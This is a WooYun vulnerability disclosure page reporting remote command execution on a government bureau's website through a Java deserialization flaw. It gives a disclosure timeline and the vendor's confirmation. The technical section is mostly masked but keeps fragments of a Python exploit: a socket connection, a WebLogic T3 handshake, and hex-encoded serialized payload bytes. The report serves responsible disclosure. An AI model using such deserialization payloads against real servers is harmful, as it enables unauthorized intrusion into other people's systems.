当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0154012
漏洞标题:
某敏感部下属局级单位主站Getshell(Java反序列化漏洞案例)
相关厂商:
某敏感部下属局级单位
漏洞作者:
故滨
提交时间:
2015-11-19 10:54
修复时间:
2016-01-11 15:32
公开时间:
2016-01-11 15:32
漏洞类型:
命令执行
危害等级:
自评Rank:
15
漏洞状态:
已交由第三方合作机构(公安部一所)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

乌云终于好了~

详细说明:

mask 区域 
1.://**.**.**//**.**.**.**/xiaofang/_
**********
*****存在java^*****
**********
2.://**.**.**//**.**.**.**/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/_
**********
*****^^*****
*****ode*****
*****n/pyt*****
*****sock*****
*****t s*****
**********
*****.AF_INET, sock*****
**********
*****rgv[1], int(*****
*****s port %s'*****
*****server_*****
**********
*****head*****
*****S:10000000\nPU:t3://u*****
*****ot;%s"&*****
*****l(head*****
**********
*****.recv(*****
*****;received "*****
**********
*****v[3],'rb*****
**********
*****x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x5*****
*****ad+payl*****
*****2\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65*****
*****(payl*****
*****de&g*****
**********
*****aylo*****
*****7cabe176.png" alt="屏^*****
**********
*****获得^*****
*****4e82c55c.png" alt="屏^*****
*****5252144a.png" alt="屏^*****

漏洞证明:

同上

修复方案:

参照官方修复方案

版权声明:转载请注明来源 故滨@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-24 14:13

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无